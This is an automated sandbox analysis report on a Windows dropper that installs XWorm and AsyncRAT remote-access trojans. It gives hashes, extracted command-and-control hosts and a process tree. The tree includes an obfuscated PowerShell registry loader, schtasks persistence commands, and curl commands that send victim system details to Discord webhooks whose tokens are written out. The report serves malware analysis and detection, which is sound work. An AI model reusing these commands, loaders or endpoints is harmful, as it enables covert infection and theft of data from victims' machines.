Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
22-06-2024 05:33
Static task
static1
Behavioral task
behavioral1
Sample
Dropper.exe
Resource
win7-20240508-en
General
-
Target
Dropper.exe
-
Size
1.4MB
-
MD5
19b0c113a289ffdac673f5746be14b9d
-
SHA1
5a6f5fa38916a6058c88d5f45fc37f89872c0cb9
-
SHA256
24e5bb5ab34a162b750abc2d8a38a48afceee92fc256f2a2fc3ff49f327fbf4a
-
SHA512
253d62161d97ad83ba272a1e749a8cbfda51bf7b2e2825d98e41039208fc22b1f91315a0e8c6ee84d3c6b4e6f2867bf64e7bb53bb77384ab6a3340338896806e
-
SSDEEP
12288:w8w1hc0Q53LOAGkjwtBx5n4AYakafNh/2mPj/YDLm7GylDULvEd8oK/mngAmgIv:wjmwDtPjwuB
Malware Config
Extracted
xworm
politics-fiber.gl.at.ply.gg:47430
-
Install_directory
%AppData%
-
install_file
$77-scchost.exe
Extracted
asyncrat
Default
environmental-blank.gl.at.ply.gg:25944
-
delay
1
-
install
true
-
install_file
$77-aachost.exe
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\$77-sdchost.exe family_xworm behavioral1/memory/2652-11-0x0000000000B70000-0x0000000000B82000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2292 created 432 2292 powershell.EXE winlogon.exe -
Async RAT payload 1 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\$77-aachost.exe family_asyncrat -
Executes dropped EXE 9 IoCs
Processes:
$77-sdchost.exe$77-aachost.exe$77-penisballs.exe$77-install.exe$77-sdchost.exe$77-aachost.exe$77-penisballs.exe$77-aachost.exe$77-aachost.exepid process 2652 $77-sdchost.exe 2664 $77-aachost.exe 2084 $77-penisballs.exe 2780 $77-install.exe 804 $77-sdchost.exe 1740 $77-aachost.exe 856 $77-penisballs.exe 2628 $77-aachost.exe 2776 $77-aachost.exe -
Loads dropped DLL 4 IoCs
Processes:
Dropper.exepid process 1636 Dropper.exe 1636 Dropper.exe 1636 Dropper.exe 1636 Dropper.exe -
Drops file in System32 directory 5 IoCs
Processes:
powershell.EXE$77-penisballs.exesvchost.exe$77-aachost.exe$77-sdchost.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf $77-penisballs.exe File opened for modification C:\Windows\System32\Tasks\$77-aachost svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe $77-aachost.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe $77-sdchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2292 set thread context of 2128 2292 powershell.EXE dllhost.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 1132 timeout.exe 1596 timeout.exe -
Modifies data under HKEY_USERS 27 IoCs
Processes:
dllhost.exe$77-penisballs.exe$77-aachost.exepowershell.EXE$77-sdchost.exe$77-aachost.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000005db2cb65c4da01 dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 $77-penisballs.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 $77-aachost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0b1f8ca65c4da01 powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000409aadcb65c4da01 dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{85BBD920-42A0-1069-A2E4-08002B30309D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000a0fbafcb65c4da01 dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ $77-sdchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{596AB062-B4D2-4215-9F74-E9109B0A8153} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000060b3a1cb65c4da01 dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{474C98EE-CF3D-41F5-80E3-4AAB0AB04301} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000060b3a1cb65c4da01 dllhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" $77-aachost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 $77-aachost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" $77-sdchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1A0391BF-9564-4294-B0A4-06C298929EF9} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 0100000000000000a0fbafcb65c4da01 dllhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" $77-aachost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" $77-sdchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ $77-aachost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000e038abcb65c4da01 dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{0A88C858-7D0C-4549-9499-7DB05F0CB0BF} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 0100000000000000a0fbafcb65c4da01 dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000005db2cb65c4da01 dllhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" dllhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{7B4A83B6-F704-4B77-8E3D-C6087E3A21D2} {BDDACB60-7657-47AE-8445-D23E1ACF82AE} 0xFFFF = 0100000000000000a0fbafcb65c4da01 dllhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\ntshrui.dll,-103 = "S&hare with" dllhost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 2316 schtasks.exe 2424 schtasks.exe 2680 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
powershell.EXEdllhost.exe$77-aachost.exe$77-penisballs.exe$77-aachost.exe$77-penisballs.exepid process 2292 powershell.EXE 2292 powershell.EXE 2128 dllhost.exe 2128 dllhost.exe 2128 dllhost.exe 2128 dllhost.exe 2664 $77-aachost.exe 2664 $77-aachost.exe 2664 $77-aachost.exe 2084 $77-penisballs.exe 2084 $77-penisballs.exe 1740 $77-aachost.exe 1740 $77-aachost.exe 1740 $77-aachost.exe 856 $77-penisballs.exe 856 $77-penisballs.exe 2128 dllhost.exe 2128 dllhost.exe 856 $77-penisballs.exe 856 $77-penisballs.exe 856 $77-penisballs.exe 856 $77-penisballs.exe 856 $77-penisballs.exe 856 $77-penisballs.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
$77-sdchost.exe$77-penisballs.exepowershell.EXEdllhost.exe$77-sdchost.exe$77-aachost.exe$77-penisballs.exe$77-aachost.exe$77-aachost.exe$77-aachost.exedescription pid process Token: SeDebugPrivilege 2652 $77-sdchost.exe Token: SeDebugPrivilege 2084 $77-penisballs.exe Token: SeDebugPrivilege 2292 powershell.EXE Token: SeDebugPrivilege 2292 powershell.EXE Token: SeDebugPrivilege 2128 dllhost.exe Token: SeDebugPrivilege 804 $77-sdchost.exe Token: SeDebugPrivilege 2664 $77-aachost.exe Token: SeDebugPrivilege 856 $77-penisballs.exe Token: SeDebugPrivilege 1740 $77-aachost.exe Token: SeDebugPrivilege 804 $77-sdchost.exe Token: SeDebugPrivilege 2628 $77-aachost.exe Token: SeDebugPrivilege 2776 $77-aachost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
$77-penisballs.exe$77-penisballs.exepid process 2084 $77-penisballs.exe 856 $77-penisballs.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Dropper.exetaskeng.exepowershell.EXEdllhost.exe$77-aachost.execmd.execmd.exedescription pid process target process PID 1636 wrote to memory of 2284 1636 Dropper.exe cmd.exe PID 1636 wrote to memory of 2284 1636 Dropper.exe cmd.exe PID 1636 wrote to memory of 2284 1636 Dropper.exe cmd.exe PID 1636 wrote to memory of 2284 1636 Dropper.exe cmd.exe PID 1636 wrote to memory of 2652 1636 Dropper.exe $77-sdchost.exe PID 1636 wrote to memory of 2652 1636 Dropper.exe $77-sdchost.exe PID 1636 wrote to memory of 2652 1636 Dropper.exe $77-sdchost.exe PID 1636 wrote to memory of 2652 1636 Dropper.exe $77-sdchost.exe PID 1636 wrote to memory of 2664 1636 Dropper.exe $77-aachost.exe PID 1636 wrote to memory of 2664 1636 Dropper.exe $77-aachost.exe PID 1636 wrote to memory of 2664 1636 Dropper.exe $77-aachost.exe PID 1636 wrote to memory of 2664 1636 Dropper.exe $77-aachost.exe PID 1636 wrote to memory of 2084 1636 Dropper.exe $77-penisballs.exe PID 1636 wrote to memory of 2084 1636 Dropper.exe $77-penisballs.exe PID 1636 wrote to memory of 2084 1636 Dropper.exe $77-penisballs.exe PID 1636 wrote to memory of 2084 1636 Dropper.exe $77-penisballs.exe PID 1636 wrote to memory of 2780 1636 Dropper.exe $77-install.exe PID 1636 wrote to memory of 2780 1636 Dropper.exe $77-install.exe PID 1636 wrote to memory of 2780 1636 Dropper.exe $77-install.exe PID 1636 wrote to memory of 2780 1636 Dropper.exe $77-install.exe PID 1636 wrote to memory of 2780 1636 Dropper.exe $77-install.exe PID 1636 wrote to memory of 2780 1636 Dropper.exe $77-install.exe PID 1636 wrote to memory of 2780 1636 Dropper.exe $77-install.exe PID 2808 wrote to memory of 2292 2808 taskeng.exe powershell.EXE PID 2808 wrote to memory of 2292 2808 taskeng.exe powershell.EXE PID 2808 wrote to memory of 2292 2808 taskeng.exe powershell.EXE PID 2292 wrote to memory of 2128 2292 powershell.EXE dllhost.exe PID 2292 wrote to memory of 2128 2292 powershell.EXE dllhost.exe PID 2292 wrote to memory of 2128 2292 powershell.EXE dllhost.exe PID 2292 wrote to memory of 2128 2292 powershell.EXE dllhost.exe PID 2292 wrote to memory of 2128 2292 powershell.EXE dllhost.exe PID 2292 wrote to memory of 2128 2292 powershell.EXE dllhost.exe PID 2292 wrote to memory of 2128 2292 powershell.EXE dllhost.exe PID 2292 wrote to memory of 2128 2292 powershell.EXE dllhost.exe PID 2292 wrote to memory of 2128 2292 powershell.EXE dllhost.exe PID 2128 wrote to memory of 432 2128 dllhost.exe winlogon.exe PID 2128 wrote to memory of 480 2128 dllhost.exe services.exe PID 2128 wrote to memory of 488 2128 dllhost.exe lsass.exe PID 2128 wrote to memory of 496 2128 dllhost.exe lsm.exe PID 2128 wrote to memory of 804 2128 dllhost.exe $77-sdchost.exe PID 2128 wrote to memory of 804 2128 dllhost.exe $77-sdchost.exe PID 2128 wrote to memory of 804 2128 dllhost.exe $77-sdchost.exe PID 2128 wrote to memory of 1740 2128 dllhost.exe $77-aachost.exe PID 2128 wrote to memory of 1740 2128 dllhost.exe $77-aachost.exe PID 2128 wrote to memory of 1740 2128 dllhost.exe $77-aachost.exe PID 2128 wrote to memory of 592 2128 dllhost.exe svchost.exe PID 2128 wrote to memory of 856 2128 dllhost.exe $77-penisballs.exe PID 2128 wrote to memory of 856 2128 dllhost.exe $77-penisballs.exe PID 2128 wrote to memory of 856 2128 dllhost.exe $77-penisballs.exe PID 2128 wrote to memory of 668 2128 dllhost.exe svchost.exe PID 2128 wrote to memory of 748 2128 dllhost.exe svchost.exe PID 2664 wrote to memory of 580 2664 $77-aachost.exe cmd.exe PID 2664 wrote to memory of 580 2664 $77-aachost.exe cmd.exe PID 2664 wrote to memory of 580 2664 $77-aachost.exe cmd.exe PID 2664 wrote to memory of 1808 2664 $77-aachost.exe cmd.exe PID 2664 wrote to memory of 1808 2664 $77-aachost.exe cmd.exe PID 2664 wrote to memory of 1808 2664 $77-aachost.exe cmd.exe PID 1808 wrote to memory of 1132 1808 cmd.exe timeout.exe PID 1808 wrote to memory of 1132 1808 cmd.exe timeout.exe PID 1808 wrote to memory of 1132 1808 cmd.exe timeout.exe PID 2128 wrote to memory of 808 2128 dllhost.exe svchost.exe PID 580 wrote to memory of 2316 580 cmd.exe schtasks.exe PID 580 wrote to memory of 2316 580 cmd.exe schtasks.exe PID 580 wrote to memory of 2316 580 cmd.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{56ad2e2b-f271-43a7-b521-81f6ee80bebe}2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"' & exit4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.execmd /c ""C:\Windows\TEMP\tmp34F5.tmp.bat""4⤵
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: SYSTEM\nOS: Microsoft Windows NT 6.1.7601 Service Pack 1\nProcessors: 8\nMachine Name: PUMARTNR\nSystem Architecture: 64-bit\nHWID: 2E0ADD3FE2A706954F8C\nUser HWID: S-1-5-18\nAnti-Virus: Unknown\n```\"}" https://discord.com/api/webhooks/1253702401148588093/dy9JeySIO-GmMDLOGujcr56gIgSixllB84150v7DKIbzkhbLiHitZal0nF3_B2IriNPY6⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\system32\taskeng.exetaskeng.exe {98EB832A-1BF5-4208-900E-90BB98948D0E} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+'W'+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+'7'+[Char](115)+''+[Char](116)+'a'+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"3⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2F1C.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\$77-aachost.exe"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.1.7601 Service Pack 1\nProcessors: 8\nMachine Name: PUMARTNR\nSystem Architecture: 64-bit\nHWID: 1459E3DC92264459B5C1\nUser HWID: S-1-5-21-2737914667-933161113-3798636211-1000\nAnti-Virus: Unknown\n```\"}" https://discord.com/api/webhooks/1253702401148588093/dy9JeySIO-GmMDLOGujcr56gIgSixllB84150v7DKIbzkhbLiHitZal0nF3_B2IriNPY6⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\$77-install.exe"C:\Users\Admin\AppData\Local\Temp\$77-install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2082558270168315110-121243796510879053351864046498-9622193961586781458-1196520806"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tmp2F1C.tmp.batFilesize
155B
MD560cfce000a0dcea7e0d8a3b03d4fae32
SHA1dc2e9ec81317ab32a68d04c084049f280b3d92a4
SHA25649a9166372214d123ad2b9b694c1e5b33b345eef27b06de5af686b086cdb94fd
SHA5127a8b8d35be2d0620778c4988685d87fc4251141e5f4fc94cf62c7891b4ae81c2378beff66edf84ebe8aaa81614c1df60ff65a072d9118f7bdc737833879366bf
-
C:\Windows\Temp\tmp34F5.tmp.batFilesize
163B
MD53d78c61dc0f919cee238b2627cd85446
SHA1c54c142edf2744d376db5939c3f738de9728168d
SHA256a1f86929b73112912c86411775619ec9eaef6f27e93de4af5c72ed6199940286
SHA512ee70df2d5fe7b0ec96d2e2758232f33d3a6d84b4ba3b40437bbd469aca567449b2a5ca7a0229026d8a49310b9e95c7b362d7398264c4fa0dbe4df8b0be86fb2b
-
\Users\Admin\AppData\Local\Temp\$77-aachost.exeFilesize
66KB
MD5f10712f4faa374be8f37668c5ebed4a6
SHA1bb30e941c4f91ae3178539e993abecbfd838fdb0
SHA256d66c793c2e3290b3996b54f5a2fc2c1973fc41677ec46ce0e0e30aa4e7916acf
SHA512cb838ec3d65ca49bb25bd93e06666e6c2640c66fd0b68fc826ca763a3dedcc4d4033abab7cfca2fff3bf08ed98d14533abf19026fd9d1845dbf09fcb241840ac
-
\Users\Admin\AppData\Local\Temp\$77-install.exeFilesize
163KB
MD51a7d1b5d24ba30c4d3d5502295ab5e89
SHA12d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
\Users\Admin\AppData\Local\Temp\$77-penisballs.exeFilesize
256KB
MD518f497deffe88b6b2cff336a277aface
SHA14e1413241d3d3e4dbff399d179f8fd64f3ecd39e
SHA2568133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
SHA51235c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d
-
\Users\Admin\AppData\Local\Temp\$77-sdchost.exeFilesize
50KB
MD577a71f3a441aa3bf824967e52413bec5
SHA1c3d6df5cfc5eefaadf9bcb3703484e3cadf79588
SHA2561e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82
SHA51231c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b
-
memory/432-55-0x0000000000330000-0x000000000035B000-memory.dmpFilesize
172KB
-
memory/432-63-0x0000000036F60000-0x0000000036F70000-memory.dmpFilesize
64KB
-
memory/432-51-0x0000000000300000-0x0000000000325000-memory.dmpFilesize
148KB
-
memory/432-53-0x0000000000300000-0x0000000000325000-memory.dmpFilesize
148KB
-
memory/432-54-0x0000000000330000-0x000000000035B000-memory.dmpFilesize
172KB
-
memory/432-62-0x000007FEBF180000-0x000007FEBF190000-memory.dmpFilesize
64KB
-
memory/432-61-0x0000000000330000-0x000000000035B000-memory.dmpFilesize
172KB
-
memory/480-76-0x000007FEBF180000-0x000007FEBF190000-memory.dmpFilesize
64KB
-
memory/480-69-0x0000000000F50000-0x0000000000F7B000-memory.dmpFilesize
172KB
-
memory/480-75-0x0000000000F50000-0x0000000000F7B000-memory.dmpFilesize
172KB
-
memory/480-77-0x0000000036F60000-0x0000000036F70000-memory.dmpFilesize
64KB
-
memory/488-89-0x00000000000A0000-0x00000000000CB000-memory.dmpFilesize
